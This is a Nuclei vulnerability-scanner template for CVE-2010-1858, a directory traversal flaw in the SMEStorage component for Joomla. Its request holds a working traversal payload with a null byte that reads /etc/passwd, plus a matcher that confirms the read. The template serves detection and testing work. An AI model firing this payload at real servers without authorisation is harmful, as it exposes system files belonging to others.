my-nuclei-templates/CVE-2010-1858.yaml

31 lines
1.1 KiB
YAML

id: CVE-2010-1858
info:
name: Joomla! Component SMEStorage - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the SMEStorage (com_smestorage) component before 1.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11853
- https://www.cvedetails.com/cve/CVE-2010-1858
- http://web.archive.org/web/20210121194940/https://www.securityfocus.com/bid/38911/
- http://packetstormsecurity.org/1003-exploits/joomlasmestorage-lfi.txt
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1858
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15